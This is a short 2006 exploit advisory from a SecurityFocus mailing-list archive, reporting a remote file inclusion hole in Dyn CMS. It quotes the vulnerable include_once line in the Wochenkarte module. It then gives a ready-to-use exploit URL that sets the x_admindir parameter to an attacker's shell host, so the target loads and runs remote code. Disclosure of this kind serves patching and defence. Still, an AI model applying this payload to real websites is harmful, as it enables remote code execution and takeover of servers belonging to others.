Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit Sep 02 2006 08:53PM
SHiKaA- hotmail com
#=======================================================================
=======================

#Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit

#=======================================================================
========================

#

#Critical Level : Dangerous

#

#Venedor site : http://www.dyncms.com/

#

#Version : REleased

#

#=======================================================================
=========================

#Bug in : 0_admin/modules/Wochenkarte/frontend/index.php

#

#Vlu Code :

#--------------------------------

# <?

include_once($x_admindir."/modules/".$xmodulname."/frontend/tools.inc.ph
p");

#

#

#=======================================================================
=========================

#

#Exploit :

#--------------------------------

#

#http://sitename.com/[Script Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://S
HELLURL.COM?

#

#=======================================================================
=========================

#Discoverd By : SHiKaA

#

#Conatact : SHiKaA-[at]hotmail.com

#

#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior

========================================================================
==========================

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus